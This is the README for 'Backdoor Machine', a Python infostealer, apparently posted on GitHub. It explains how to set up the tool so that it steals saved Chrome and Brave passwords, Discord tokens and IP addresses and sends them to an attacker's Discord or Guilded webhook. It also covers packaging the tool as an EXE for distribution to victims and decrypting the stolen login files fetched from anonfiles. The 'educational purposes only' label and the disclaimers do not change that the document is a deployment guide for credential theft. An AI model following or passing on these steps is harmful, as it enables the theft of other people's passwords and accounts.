❗
For educational purposes only
❗
Backdoor Machine -
A program made in python for stealing passwords and usernames from Google Chrome/Brave and tokenlog the user's discord. It will send a message in a webhook, with all the tokens, login info, ip and so on.
How to use
- Download the latest release.
- Install the requirements:
pip install requests pip install pywin32 pip install pycryptodome
- Make a webhook in a discord server/guilded.gg server.
- Copy the webhook url into webhook.txt
- Run the code or something.
Compile for distribution (EXE)
- Install pyinstaller:
pip install pyinstaller
- Make a webhook on discord or guilded and copy the url.
- Paste the webhook url into webhook.txt
- Run the file "build.py"
- When its done, go into the "dist" directory and exe should be in there.
Decrypt the user data from the .enc file
You can turn off encryption in main.py by setting encrypt_loginInfo to False in the Config section(not recommended).
- Download the login info file from the anonfiles url, and put it in the directory of Backdoor Machine.
- Run decrypt.py, and you will get prompted for the path to the file you just downloaded.
- Type the name of the file you downloaded(for instance, bravelogin.enc), and press enter.
- Then on the next prompt, paste in the decryption key for the file(found in the embed).
- It will then output a file with the pure login information from google chrome or brave browser.
Legal disclaimer:
Usage of Backdoor Machine for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
A message to github
This software is not ment to be used maliciously in any way. I just made this for fun and published it on github so that other people can use the code that I wrote.